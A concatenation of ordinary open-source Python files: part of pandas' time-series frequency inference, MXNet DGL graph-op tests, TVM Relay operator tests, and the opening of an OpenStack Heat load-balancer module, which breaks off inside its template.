self.is_monotonic = self.index.is_monotonic
@cache_readonly
def deltas(self):
return tslib.unique_deltas(self.values)
@cache_readonly
def deltas_asi8(self):
return tslib.unique_deltas(self.index.asi8)
@cache_readonly
def is_unique(self):
return len(self.deltas) == 1
@cache_readonly
def is_unique_asi8(self):
return len(self.deltas_asi8) == 1
def get_freq(self):
if not self.is_monotonic or not self.index.is_unique:
return None
delta = self.deltas[0]
if _is_multiple(delta, _ONE_DAY):
return self._infer_daily_rule()
else:
# Possibly intraday frequency. Here we use the
# original .asi8 values as the modified values
# will not work around DST transitions. See #8772
if not self.is_unique_asi8:
return None
delta = self.deltas_asi8[0]
if _is_multiple(delta, _ONE_HOUR):
# Hours
return _maybe_add_count('H', delta / _ONE_HOUR)
elif _is_multiple(delta, _ONE_MINUTE):
# Minutes
return _maybe_add_count('T', delta / _ONE_MINUTE)
elif _is_multiple(delta, _ONE_SECOND):
# Seconds
return _maybe_add_count('S', delta / _ONE_SECOND)
elif _is_multiple(delta, _ONE_MILLI):
# Milliseconds
return _maybe_add_count('L', delta / _ONE_MILLI)
elif _is_multiple(delta, _ONE_MICRO):
# Microseconds
return _maybe_add_count('U', delta / _ONE_MICRO)
else:
# Nanoseconds
return _maybe_add_count('N', delta)
@cache_readonly
def day_deltas(self):
return [x / _ONE_DAY for x in self.deltas]
@cache_readonly
def fields(self):
return tslib.build_field_sarray(self.values)
@cache_readonly
def rep_stamp(self):
return lib.Timestamp(self.values[0])
def month_position_check(self):
# TODO: cythonize this, very slow
calendar_end = True
business_end = True
calendar_start = True
business_start = True
years = self.fields['Y']
months = self.fields['M']
days = self.fields['D']
weekdays = self.index.dayofweek
from calendar import monthrange
for y, m, d, wd in zip(years, months, days, weekdays):
wd = datetime(y, m, d).weekday()
if calendar_start:
calendar_start &= d == 1
if business_start:
business_start &= d == 1 or (d <= 3 and wd == 0)
if calendar_end or business_end:
_, daysinmonth = monthrange(y, m)
cal = d == daysinmonth
if calendar_end:
calendar_end &= cal
if business_end:
business_end &= cal or (daysinmonth - d < 3 and wd == 4)
elif not calendar_start and not business_start:
break
if calendar_end:
return 'ce'
elif business_end:
return 'be'
elif calendar_start:
return 'cs'
elif business_start:
return 'bs'
else:
return None
@cache_readonly
def mdiffs(self):
nmonths = self.fields['Y'] * 12 + self.fields['M']
return tslib.unique_deltas(nmonths.astype('i8'))
@cache_readonly
def ydiffs(self):
return tslib.unique_deltas(self.fields['Y'].astype('i8'))
def _infer_daily_rule(self):
annual_rule = self._get_annual_rule()
if annual_rule:
nyears = self.ydiffs[0]
month = _month_aliases[self.rep_stamp.month]
return _maybe_add_count('%s-%s' % (annual_rule, month), nyears)
quarterly_rule = self._get_quarterly_rule()
if quarterly_rule:
nquarters = self.mdiffs[0] / 3
mod_dict = {0: 12, 2: 11, 1: 10}
month = _month_aliases[mod_dict[self.rep_stamp.month % 3]]
return _maybe_add_count('%s-%s' % (quarterly_rule, month),
nquarters)
monthly_rule = self._get_monthly_rule()
if monthly_rule:
return monthly_rule
if self.is_unique:
days = self.deltas[0] / _ONE_DAY
if days % 7 == 0:
# Weekly
alias = _weekday_rule_aliases[self.rep_stamp.weekday()]
return _maybe_add_count('W-%s' % alias, days / 7)
else:
return _maybe_add_count('D', days)
# Business daily. Maybe
if self.day_deltas == [1, 3]:
return 'B'
wom_rule = self._get_wom_rule()
if wom_rule:
return wom_rule
def _get_annual_rule(self):
if len(self.ydiffs) > 1:
return None
if len(algos.unique(self.fields['M'])) > 1:
return None
pos_check = self.month_position_check()
return {'cs': 'AS', 'bs': 'BAS',
'ce': 'A', 'be': 'BA'}.get(pos_check)
def _get_quarterly_rule(self):
if len(self.mdiffs) > 1:
return None
if not self.mdiffs[0] % 3 == 0:
return None
pos_check = self.month_position_check()
return {'cs': 'QS', 'bs': 'BQS',
'ce': 'Q', 'be': 'BQ'}.get(pos_check)
def _get_monthly_rule(self):
if len(self.mdiffs) > 1:
return None
pos_check = self.month_position_check()
return {'cs': 'MS', 'bs': 'BMS',
'ce': 'M', 'be': 'BM'}.get(pos_check)
def _get_wom_rule(self):
# wdiffs = unique(np.diff(self.index.week))
#We also need -47, -49, -48 to catch index spanning year boundary
# if not lib.ismember(wdiffs, set([4, 5, -47, -49, -48])).all():
# return None
weekdays = unique(self.index.weekday)
if len(weekdays) > 1:
return None
week_of_months = unique((self.index.day - 1) // 7)
if len(week_of_months) > 1:
return None
# get which week
week = week_of_months[0] + 1
wd = _weekday_rule_aliases[weekdays[0]]
return 'WOM-%d%s' % (week, wd)
import pandas.core.algorithms as algos
class _TimedeltaFrequencyInferer(_FrequencyInferer):
def _infer_daily_rule(self):
if self.is_unique:
days = self.deltas[0] / _ONE_DAY
if days % 7 == 0:
# Weekly
alias = _weekday_rule_aliases[self.rep_stamp.weekday()]
return _maybe_add_count('W-%s' % alias, days / 7)
else:
return _maybe_add_count('D', days)
def _maybe_add_count(base, count):
if count > 1:
return '%d%s' % (count, base)
else:
return base
def is_subperiod(source, target):
"""
Returns True if downsampling is possible between source and target
frequencies
Parameters
----------
source : string
Frequency converting from
target : string
Frequency converting to
Returns
-------
is_subperiod : boolean
"""
if isinstance(source, offsets.DateOffset):
source = source.rule_code
if isinstance(target, offsets.DateOffset):
target = target.rule_code
target = target.upper()
source = source.upper()
if _is_annual(target):
if _is_quarterly(source):
return _quarter_months_conform(_get_rule_month(source),
_get_rule_month(target))
return source in ['D', 'C', 'B', 'M', 'H', 'T', 'S', 'L', 'U', 'N']
elif _is_quarterly(target):
return source in ['D', 'C', 'B', 'M', 'H', 'T', 'S', 'L', 'U', 'N']
elif target == 'M':
return source in ['D', 'C', 'B', 'H', 'T', 'S', 'L', 'U', 'N']
elif _is_weekly(target):
return source in [target, 'D', 'C', 'B', 'H', 'T', 'S', 'L', 'U', 'N']
elif target == 'B':
return source in ['B', 'H', 'T', 'S', 'L', 'U', 'N']
elif target == 'C':
return source in ['C', 'H', 'T', 'S', 'L', 'U', 'N']
elif target == 'D':
return source in ['D', 'H', 'T', 'S', 'L', 'U', 'N']
elif target == 'H':
return source in ['H', 'T', 'S', 'L', 'U', 'N']
elif target == 'T':
return source in ['T', 'S', 'L', 'U', 'N']
elif target == 'S':
return source in ['S', 'L', 'U', 'N']
elif target == 'L':
return source in ['L', 'U', 'N']
elif target == 'U':
return source in ['U', 'N']
elif target == 'N':
return source in ['N']
def is_superperiod(source, target):
"""
Returns True if upsampling is possible between source and target
frequencies
Parameters
----------
source : string
Frequency converting from
target : string
Frequency converting to
Returns
-------
is_superperiod : boolean
"""
if isinstance(source, offsets.DateOffset):
source = source.rule_code
if isinstance(target, offsets.DateOffset):
target = target.rule_code
target = target.upper()
source = source.upper()
if _is_annual(source):
if _is_annual(target):
return _get_rule_month(source) == _get_rule_month(target)
if _is_quarterly(target):
smonth = _get_rule_month(source)
tmonth = _get_rule_month(target)
return _quarter_months_conform(smonth, tmonth)
return target in ['D', 'C', 'B', 'M', 'H', 'T', 'S', 'L', 'U', 'N']
elif _is_quarterly(source):
return target in ['D', 'C', 'B', 'M', 'H', 'T', 'S', 'L', 'U', 'N']
elif source == 'M':
return target in ['D', 'C', 'B', 'H', 'T', 'S', 'L', 'U', 'N']
elif _is_weekly(source):
return target in [source, 'D', 'C', 'B', 'H', 'T', 'S', 'L', 'U', 'N']
elif source == 'B':
return target in ['D', 'C', 'B', 'H', 'T', 'S', 'L', 'U', 'N']
elif source == 'C':
return target in ['D', 'C', 'B', 'H', 'T', 'S', 'L', 'U', 'N']
elif source == 'D':
return target in ['D', 'C', 'B', 'H', 'T', 'S', 'L', 'U', 'N']
elif source == 'H':
return target in ['H', 'T', 'S', 'L', 'U', 'N']
elif source == 'T':
return target in ['T', 'S', 'L', 'U', 'N']
elif source == 'S':
return target in ['S', 'L', 'U', 'N']
elif source == 'L':
return target in ['L', 'U', 'N']
elif source == 'U':
return target in ['U', 'N']
elif source == 'N':
return target in ['N']
def _get_rule_month(source, default='DEC'):
source = source.upper()
if '-' not in source:
return default
else:
return source.split('-')[1]
def _is_annual(rule):
rule = rule.upper()
return rule == 'A' or rule.startswith('A-')
def _quarter_months_conform(source, target):
snum = _month_numbers[source]
tnum = _month_numbers[target]
return snum % 3 == tnum % 3
def _is_quarterly(rule):
rule = rule.upper()
return rule == 'Q' or rule.startswith('Q-')
def _is_weekly(rule):
rule = rule.upper()
return rule == 'W' or rule.startswith('W-')
DAYS = ['MON', 'TUE', 'WED', 'THU', 'FRI', 'SAT', 'SUN']
MONTHS = ['JAN', 'FEB', 'MAR', 'APR', 'MAY', 'JUN', 'JUL',
'AUG', 'SEP', 'OCT', 'NOV', 'DEC']
_month_numbers = dict((k, i) for i, k in enumerate(MONTHS))
_weekday_rule_aliases = dict((k, v) for k, v in enumerate(DAYS))
_month_aliases = dict((k + 1, v) for k, v in enumerate(MONTHS))
def _is_multiple(us, mult):
return us % mult == 0
|
|
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
# pylint: skip-file
from __future__ import print_function
import numpy as np
import scipy as sp
import mxnet as mx
import random
import itertools
from numpy.testing import assert_allclose, assert_array_equal
from mxnet.test_utils import *
import unittest
def check_uniform(out, num_hops, max_num_vertices):
sample_id = out[0]
sub_csr = out[1]
layer = out[2]
# check sample_id
assert (len(sample_id) == max_num_vertices+1)
num_vertices = sample_id[-1].asnumpy()[0]
# check sub_csr
sub_csr.check_format(full_check=True)
assert np.all((sub_csr.indptr[num_vertices:] == sub_csr.indptr[num_vertices]).asnumpy())
# check layer
for data in layer[:num_vertices]:
assert(data <= num_hops)
def check_non_uniform(out, num_hops, max_num_vertices):
sample_id = out[0]
sub_csr = out[1]
prob = out[2]
layer = out[3]
# check sample_id
assert (len(sample_id) == max_num_vertices+1)
num_vertices = sample_id[-1].asnumpy()[0]
# check sub_csr
sub_csr.check_format(full_check=True)
assert np.all((sub_csr.indptr[num_vertices:] == sub_csr.indptr[num_vertices]).asnumpy())
# check prob
assert (len(prob) == max_num_vertices)
# check layer
for data in layer[:num_vertices]:
assert(data <= num_hops)
def check_compact(csr, id_arr, num_nodes):
compact = mx.nd.contrib.dgl_graph_compact(csr, id_arr, graph_sizes=num_nodes, return_mapping=False)
assert compact.shape[0] == num_nodes
assert compact.shape[1] == num_nodes
assert mx.nd.sum(compact.indptr == csr.indptr[0:(num_nodes + 1)]).asnumpy() == num_nodes + 1
sub_indices = compact.indices.asnumpy()
indices = csr.indices.asnumpy()
id_arr = id_arr.asnumpy()
for i in range(len(sub_indices)):
sub_id = sub_indices[i]
assert id_arr[sub_id] == indices[i]
def test_uniform_sample():
shape = (5, 5)
data_np = np.array([1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20], dtype=np.int64)
indices_np = np.array([1,2,3,4,0,2,3,4,0,1,3,4,0,1,2,4,0,1,2,3], dtype=np.int64)
indptr_np = np.array([0,4,8,12,16,20], dtype=np.int64)
a = mx.nd.sparse.csr_matrix((data_np, indices_np, indptr_np), shape=shape)
seed = mx.nd.array([0,1,2,3,4], dtype=np.int64)
out = mx.nd.contrib.dgl_csr_neighbor_uniform_sample(a, seed, num_args=2, num_hops=1, num_neighbor=2, max_num_vertices=5)
assert (len(out) == 3)
check_uniform(out, num_hops=1, max_num_vertices=5)
num_nodes = out[0][-1].asnumpy()
assert num_nodes > 0
assert num_nodes < len(out[0])
check_compact(out[1], out[0], num_nodes)
seed = mx.nd.array([0], dtype=np.int64)
out = mx.nd.contrib.dgl_csr_neighbor_uniform_sample(a, seed, num_args=2, num_hops=1, num_neighbor=1, max_num_vertices=4)
assert (len(out) == 3)
check_uniform(out, num_hops=1, max_num_vertices=4)
num_nodes = out[0][-1].asnumpy()
assert num_nodes > 0
assert num_nodes < len(out[0])
check_compact(out[1], out[0], num_nodes)
seed = mx.nd.array([0], dtype=np.int64)
out = mx.nd.contrib.dgl_csr_neighbor_uniform_sample(a, seed, num_args=2, num_hops=2, num_neighbor=1, max_num_vertices=3)
assert (len(out) == 3)
check_uniform(out, num_hops=2, max_num_vertices=3)
num_nodes = out[0][-1].asnumpy()
assert num_nodes > 0
assert num_nodes < len(out[0])
check_compact(out[1], out[0], num_nodes)
seed = mx.nd.array([0,2,4], dtype=np.int64)
out = mx.nd.contrib.dgl_csr_neighbor_uniform_sample(a, seed, num_args=2, num_hops=1, num_neighbor=2, max_num_vertices=5)
assert (len(out) == 3)
check_uniform(out, num_hops=1, max_num_vertices=5)
num_nodes = out[0][-1].asnumpy()
assert num_nodes > 0
assert num_nodes < len(out[0])
check_compact(out[1], out[0], num_nodes)
seed = mx.nd.array([0,4], dtype=np.int64)
out = mx.nd.contrib.dgl_csr_neighbor_uniform_sample(a, seed, num_args=2, num_hops=1, num_neighbor=2, max_num_vertices=5)
assert (len(out) == 3)
check_uniform(out, num_hops=1, max_num_vertices=5)
num_nodes = out[0][-1].asnumpy()
assert num_nodes > 0
assert num_nodes < len(out[0])
check_compact(out[1], out[0], num_nodes)
seed = mx.nd.array([0,4], dtype=np.int64)
out = mx.nd.contrib.dgl_csr_neighbor_uniform_sample(a, seed, num_args=2, num_hops=2, num_neighbor=2, max_num_vertices=5)
assert (len(out) == 3)
check_uniform(out, num_hops=2, max_num_vertices=5)
num_nodes = out[0][-1].asnumpy()
assert num_nodes > 0
assert num_nodes < len(out[0])
check_compact(out[1], out[0], num_nodes)
seed = mx.nd.array([0,4], dtype=np.int64)
out = mx.nd.contrib.dgl_csr_neighbor_uniform_sample(a, seed, num_args=2, num_hops=1, num_neighbor=2, max_num_vertices=5)
assert (len(out) == 3)
check_uniform(out, num_hops=1, max_num_vertices=5)
num_nodes = out[0][-1].asnumpy()
assert num_nodes > 0
assert num_nodes < len(out[0])
check_compact(out[1], out[0], num_nodes)
def test_non_uniform_sample():
shape = (5, 5)
prob = mx.nd.array([0.9, 0.8, 0.2, 0.4, 0.1], dtype=np.float32)
data_np = np.array([1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20], dtype=np.int64)
indices_np = np.array([1,2,3,4,0,2,3,4,0,1,3,4,0,1,2,4,0,1,2,3], dtype=np.int64)
indptr_np = np.array([0,4,8,12,16,20], dtype=np.int64)
a = mx.nd.sparse.csr_matrix((data_np, indices_np, indptr_np), shape=shape)
seed = mx.nd.array([0,1,2,3,4], dtype=np.int64)
out = mx.nd.contrib.dgl_csr_neighbor_non_uniform_sample(a, prob, seed, num_args=3, num_hops=1, num_neighbor=2, max_num_vertices=5)
assert (len(out) == 4)
check_non_uniform(out, num_hops=1, max_num_vertices=5)
seed = mx.nd.array([0], dtype=np.int64)
out = mx.nd.contrib.dgl_csr_neighbor_non_uniform_sample(a, prob, seed, num_args=3, num_hops=1, num_neighbor=1, max_num_vertices=4)
assert (len(out) == 4)
check_non_uniform(out, num_hops=1, max_num_vertices=4)
seed = mx.nd.array([0], dtype=np.int64)
out = mx.nd.contrib.dgl_csr_neighbor_non_uniform_sample(a, prob, seed, num_args=3, num_hops=2, num_neighbor=1, max_num_vertices=4)
assert (len(out) == 4)
check_non_uniform(out, num_hops=2, max_num_vertices=4)
seed = mx.nd.array([0,2,4], dtype=np.int64)
out = mx.nd.contrib.dgl_csr_neighbor_non_uniform_sample(a, prob, seed, num_args=3, num_hops=1, num_neighbor=2, max_num_vertices=5)
assert (len(out) == 4)
check_non_uniform(out, num_hops=1, max_num_vertices=5)
seed = mx.nd.array([0,4], dtype=np.int64)
out = mx.nd.contrib.dgl_csr_neighbor_non_uniform_sample(a, prob, seed, num_args=3, num_hops=1, num_neighbor=2, max_num_vertices=5)
assert (len(out) == 4)
check_non_uniform(out, num_hops=1, max_num_vertices=5)
seed = mx.nd.array([0,4], dtype=np.int64)
out = mx.nd.contrib.dgl_csr_neighbor_non_uniform_sample(a, prob, seed, num_args=3, num_hops=2, num_neighbor=2, max_num_vertices=5)
assert (len(out) == 4)
check_non_uniform(out, num_hops=2, max_num_vertices=5)
seed = mx.nd.array([0,4], dtype=np.int64)
out = mx.nd.contrib.dgl_csr_neighbor_non_uniform_sample(a, prob, seed, num_args=3, num_hops=1, num_neighbor=2, max_num_vertices=5)
assert (len(out) == 4)
check_non_uniform(out, num_hops=1, max_num_vertices=5)
def test_edge_id():
shape = rand_shape_2d()
data = rand_ndarray(shape, stype='csr', density=0.4)
ground_truth = np.zeros(shape, dtype=np.float32)
ground_truth -= 1.0
indptr_np = data.indptr.asnumpy()
data_np = data.data.asnumpy()
indices_np = data.indices.asnumpy()
for i in range(shape[0]):
for j in range(indptr_np[i], indptr_np[i+1]):
idx = indices_np[j]
ground_truth[i, idx] = data_np[j]
np_u = np.random.randint(0, shape[0], size=(5, ))
np_v = np.random.randint(0, shape[1], size=(5, ))
mx_u = mx.nd.array(np_u)
mx_v = mx.nd.array(np_v)
assert_almost_equal(mx.nd.contrib.edge_id(data, mx_u, mx_v).asnumpy(),
ground_truth[np_u, np_v], rtol=1e-5, atol=1e-6)
def generate_graph(n):
arr = sp.sparse.random(n, n, density=0.2, format='coo')
arr.data = np.arange(0, len(arr.row), dtype=np.float32)
return arr.tocsr(), mx.nd.sparse.csr_matrix(arr.tocsr()).astype(np.int64)
def test_subgraph():
sp_g, g = generate_graph(100)
vertices = np.unique(np.random.randint(0, 100, size=(20)))
subgs = mx.nd.contrib.dgl_subgraph(g, mx.nd.array(vertices, dtype=np.int64),
return_mapping=True)
subgs[0].check_format()
subgs[1].check_format()
assert_array_equal(subgs[0].indptr, subgs[1].indptr)
assert_array_equal(subgs[0].indices, subgs[1].indices)
sp_subg = subgs[1].asscipy()
for i in range(len(subgs[0].indptr) - 1):
subv1 = i
v1 = vertices[subv1]
row_start = int(subgs[0].indptr[subv1].asnumpy()[0])
row_end = int(subgs[0].indptr[subv1 + 1].asnumpy()[0])
if row_start >= len(subgs[0].indices):
remain = subgs[0].indptr[subv1:].asnumpy()
assert np.sum(remain == row_start) == len(remain)
break
row = subgs[0].indices[row_start:row_end]
for j, subv2 in enumerate(row.asnumpy()):
v2 = vertices[subv2]
assert sp_g[v1, v2] == sp_subg[subv1, subv2]
def test_adjacency():
sp_g, g = generate_graph(100)
adj = mx.nd.contrib.dgl_adjacency(g)
assert adj.dtype == np.float32
assert adj.shape == g.shape
assert_array_equal(adj.indptr, g.indptr)
assert_array_equal(adj.indices, g.indices)
assert_array_equal(adj.data, mx.nd.ones(shape=g.indices.shape))
if __name__ == "__main__":
import nose
nose.runmodule()
|
|
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
import tvm
import numpy as np
from tvm import relay
from tvm.relay import transform
from tvm.relay.testing import ctx_list
import topi.testing
def run_infer_type(expr):
mod = relay.Module.from_expr(expr)
mod = transform.InferType()(mod)
entry = mod["main"]
return entry if isinstance(expr, relay.Function) else entry.body
def test_binary_op():
def check_binary_op(opfunc, ref):
n = tvm.var("n")
t1 = relay.TensorType((5, n, 5))
t2 = relay.TensorType((n, 1))
x = relay.var("x", t1)
y = relay.var("y", t2)
z = opfunc(x, y)
# test printer
assert ("{}(%x, %y)".format(z.op.name)) in z.astext()
zz = run_infer_type(z)
assert zz.checked_type == t1
if ref is not None:
t1 = relay.TensorType((5, 10, 5))
t2 = relay.TensorType((5, 10, 5))
x = relay.var("x", t1)
y = relay.var("y", t2)
z = opfunc(x, y)
x_data = np.random.rand(5, 10, 5).astype(t1.dtype)
y_data = np.random.rand(5, 10, 5).astype(t2.dtype)
ref_res = ref(x_data, y_data)
func = relay.Function([x, y], z)
for target, ctx in ctx_list():
intrp = relay.create_executor("graph", ctx=ctx, target=target)
op_res = intrp.evaluate(func)(x_data, y_data)
tvm.testing.assert_allclose(op_res.asnumpy(), ref_res)
for opfunc, ref in [(relay.power, np.power)]:
check_binary_op(opfunc, ref)
def test_cmp_type():
for op, ref in ((relay.greater, np.greater),
(relay.greater_equal, np.greater_equal),
(relay.less, np.less),
(relay.less_equal, np.less_equal),
(relay.equal, np.equal),
(relay.not_equal, np.not_equal)):
x = relay.var("x", relay.TensorType((10, 4), "float32"))
y = relay.var("y", relay.TensorType((5, 10, 1), "float32"))
z = op(x, y)
zz = run_infer_type(z)
assert zz.checked_type == relay.TensorType((5, 10, 4), "bool")
if ref is not None:
x_shape = (10, 4)
y_shape = (5, 10, 1)
t1 = relay.TensorType(x_shape)
t2 = relay.TensorType(y_shape)
x = relay.var("x", t1)
y = relay.var("y", t2)
z = op(x, y)
x_data = np.random.rand(*x_shape).astype(t1.dtype)
y_data = np.random.rand(*y_shape).astype(t2.dtype)
ref_res = ref(x_data, y_data)
func = relay.Function([x, y], z)
for target, ctx in ctx_list():
intrp = relay.create_executor("graph", ctx=ctx, target=target)
op_res = intrp.evaluate(func)(x_data, y_data)
tvm.testing.assert_allclose(op_res.asnumpy(), ref_res)
def test_binary_int_broadcast():
for op, ref in [(relay.right_shift, np.right_shift),
(relay.left_shift, np.left_shift),
(relay.mod, np.mod),
(relay.maximum, np.maximum),
(relay.minimum, np.minimum)]:
x = relay.var("x", relay.TensorType((10, 4), "int32"))
y = relay.var("y", relay.TensorType((5, 10, 1), "int32"))
z = op(x, y)
zz = run_infer_type(z)
assert zz.checked_type == relay.TensorType((5, 10, 4), "int32")
if ref is not None:
x_shape = (10, 4)
y_shape = (5, 10, 1)
t1 = relay.TensorType(x_shape, 'int32')
t2 = relay.TensorType(y_shape, 'int32')
x_data = np.random.rand(*x_shape).astype(t1.dtype)
y_data = np.random.rand(*y_shape).astype(t2.dtype)
func = relay.Function([x, y], z)
ref_res = ref(x_data, y_data)
for target, ctx in ctx_list():
intrp = relay.create_executor("graph", ctx=ctx, target=target)
op_res = intrp.evaluate(func)(x_data, y_data)
tvm.testing.assert_allclose(op_res.asnumpy(), ref_res)
def test_where():
shape = (3, 4)
dtype = "float32"
cond = relay.var("cond", relay.TensorType(shape, dtype))
x = relay.var("x", relay.TensorType(shape, dtype))
y = relay.var("y", relay.TensorType(shape, dtype))
z = relay.where(cond, x, y)
zz = run_infer_type(z)
assert zz.checked_type == relay.TensorType(shape, dtype)
func = relay.Function([cond, x, y], z)
condition = np.random.uniform(low=-1, high=1, size=shape).astype(dtype)
x = np.random.uniform(size=shape).astype(dtype)
y = np.random.uniform(size=shape).astype(dtype)
ref_res = np.where(condition, x, y)
for target, ctx in ctx_list():
for kind in ["graph", "debug"]:
intrp = relay.create_executor(kind, ctx=ctx, target=target)
op_res = intrp.evaluate(func)(condition, x, y)
tvm.testing.assert_allclose(op_res.asnumpy(), ref_res, rtol=1e-5)
def verify_reduce(funcs, data, axis, keepdims, exclude, output, dtype="float32"):
test_func = funcs[0]
ref_func = funcs[1]
dtype = "bool" if ref_func in [np.all] else dtype
x = relay.var("x", relay.TensorType(data, dtype))
z = test_func(x, axis, keepdims, exclude)
zz = run_infer_type(z)
if axis:
assert "axis=" in z.astext()
if keepdims:
assert "keepdims=" in z.astext()
if exclude:
assert "exclude=" in z.astext()
out_type = "int32" if test_func in [relay.argmin, relay.argmax] else dtype
assert zz.checked_type == relay.ty.TensorType(output, out_type)
if all(isinstance(v, tvm.expr.Var) == 1 for v in data):
return
func = relay.Function([x], z)
x_data = np.random.choice([True, False], size=data) if ref_func in [np.all] \
else np.random.uniform(size=data).astype(dtype)
if ref_func in [np.sum]:
ref_res = ref_func(x_data + 0, axis=axis, dtype=dtype, keepdims=keepdims)
elif ref_func in [np.max, np.min, np.mean, np.prod]:
ref_res = ref_func(x_data + 0, axis=axis, keepdims=keepdims)
else: #argmin/argmax
if axis and not isinstance(axis, int) and len(axis) > 1 :
return
ref_res = ref_func(x_data + 0, axis=axis, keepdims=keepdims)
for target, ctx in ctx_list():
intrp1 = relay.create_executor("graph", ctx=ctx, target=target)
intrp2 = relay.create_executor("debug", ctx=ctx, target=target)
op_res1 = intrp1.evaluate(func)(x_data)
tvm.testing.assert_allclose(op_res1.asnumpy(), ref_res, rtol=1e-5)
op_res2 = intrp2.evaluate(func)(x_data)
tvm.testing.assert_allclose(op_res2.asnumpy(), ref_res, rtol=1e-5)
def test_reduce_functions():
def _with_keepdims(func):
def _wrapper(data, axis=None, keepdims=False):
if not keepdims:
return func(data, axis=axis)
else:
if axis is not None:
axis = axis if isinstance(axis, int) else axis[0]
out_shape = list(data.shape)
out_shape[axis] = 1
else:
out_shape = [1 for _ in range(len(data.shape))]
return func(data, axis=axis).reshape(out_shape)
return _wrapper
d1, d2, d3, d4 = tvm.var("d1"), tvm.var("d2"), tvm.var("d3"), tvm.var("d4")
for func in [[relay.sum, np.sum],
[relay.max, np.max],
[relay.min, np.min],
[relay.mean, np.mean],
[relay.prod, np.prod],
[relay.all, np.all],
[relay.argmin, _with_keepdims(np.argmin)],
[relay.argmax, _with_keepdims(np.argmax)]]:
verify_reduce(func, (d1, d2, d3, d4), None, False, False, ())
verify_reduce(func, (d1, d2, d3, d4), 2, True, False, (d1, d2, 1, d4))
verify_reduce(func, (d1, d2, d3, d4), 0, True, False, (1, d2, d3, d4))
verify_reduce(func, (d1, d2, d3), 1, True, False, (d1, 1, d3))
verify_reduce(func, (d1, d2, d3), 0, True, False, (1, d2, d3))
verify_reduce(func, (d1, d2, d3), None, True, False, (1, 1, 1))
verify_reduce(func, (d1, d2, d3), (0, 1), True, False, (1, 1, d3))
verify_reduce(func, (2, 3, 4), 1, True, False, (2, 1, 4))
verify_reduce(func, (2, 3, 4), (1,), True, False, (2, 1, 4))
verify_reduce(func, (2, 3, 4), -1, True, False, (2, 3, 1))
verify_reduce(func, (2, 3, 4), (0, 1, 2), False, False, ())
verify_reduce(func, (4, 4, 3), None, False, False, ())
verify_reduce(func, (4, 4, 3), (0, 2), False, False, (4,))
verify_reduce(func, (128, 24, 128), (0, 1), False, False, (128,))
verify_reduce(func, (128, 24, 128), (0, 2), False, False, (24,))
verify_reduce(func, (128, 24, 128), (0, 1), True, False, (1, 1, 128))
verify_reduce(func, (128, 24, 128), (0, 2), True, False, (1, 24, 1))
def test_strided_slice():
def verify(dshape, begin, end, strides, output, test_ref=True):
x = relay.var("x", relay.TensorType(dshape, "float32"))
z = relay.strided_slice(x, begin=begin, end=end, strides=strides)
func = relay.Function([x], z)
func = run_infer_type(func)
text = func.astext()
assert "begin=" in text
assert "end=" in text
if output:
assert func.body.checked_type == relay.ty.TensorType(output, "float32")
if not test_ref:
return
x_data = np.random.uniform(size=dshape).astype("float32")
ref_res = topi.testing.strided_slice_python(
x_data, begin, end, strides)
for target, ctx in ctx_list():
intrp = relay.create_executor("graph", ctx=ctx, target=target)
op_res = intrp.evaluate(func)(x_data)
tvm.testing.assert_allclose(op_res.asnumpy(), ref_res)
d1, d2, d3, d4 = tvm.var("d1"), tvm.var("d2"), tvm.var("d3"), tvm.var("d4")
verify((d1, d2, 3), [None, None, 1], [None, None, 2], None, (d1, d2, 1), False)
verify((3, 4, 3), [0, 0, 0], [4, -5, 4], [1, -1, 2], (3, 1, 2))
verify((3, 4, 3), [1, 1, 0], [4, 4, 3], [2, 1, 1], (1, 3, 3))
verify((3, 4, 3), [1, -1, 0], [4, -5, 3], [2, -1, 1], (1, 4, 3))
verify((3, 4, 3), [1, 0, 0], [2, 2, 3], [1, 1, 2], (1, 2, 2))
verify((3, 4, 3), [1, -1, 0], [2, -3, 3], [1, -1, 1], (1, 2, 3))
verify((3, 4, 3), [1, 1, 0], [4, 4, 3], None, (2, 3, 3))
verify((3, 4, 3), [1, 1, 0], [4, 1000, 3], None, (2, 3, 3))
verify((3, 4, 3), [1, 1, 0], [4, 4], None, (2, 3, 3))
verify((3, 4, 3), [1, 1], [4, 4, 3], None, (2, 3, 3))
if __name__ == "__main__":
test_strided_slice()
test_binary_op()
test_cmp_type()
test_binary_int_broadcast()
test_where()
test_reduce_functions()
|
|
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import os
from oslo_config import cfg
from oslo_log import log as logging
import six
from heat.common import exception
from heat.common.i18n import _
from heat.common import template_format
from heat.engine import attributes
from heat.engine import constraints
from heat.engine import properties
from heat.engine.resources import stack_resource
LOG = logging.getLogger(__name__)
lb_template_default = r'''
{
"AWSTemplateFormatVersion": "2010-09-09",
"Description": "Built in HAProxy server using Fedora 21 x64 cloud image",
"Parameters" : {
"KeyName" : {
"Type" : "String"
},
"LbImageId" : {
"Type" : "String",
"Default" : "Fedora-Cloud-Base-20141203-21.x86_64"
},
"LbFlavor" : {
"Type" : "String",
"Default" : "m1.small"
},
"LBTimeout" : {
"Type" : "String",
"Default" : "600"
},
"SecurityGroups" : {
"Type" : "CommaDelimitedList",
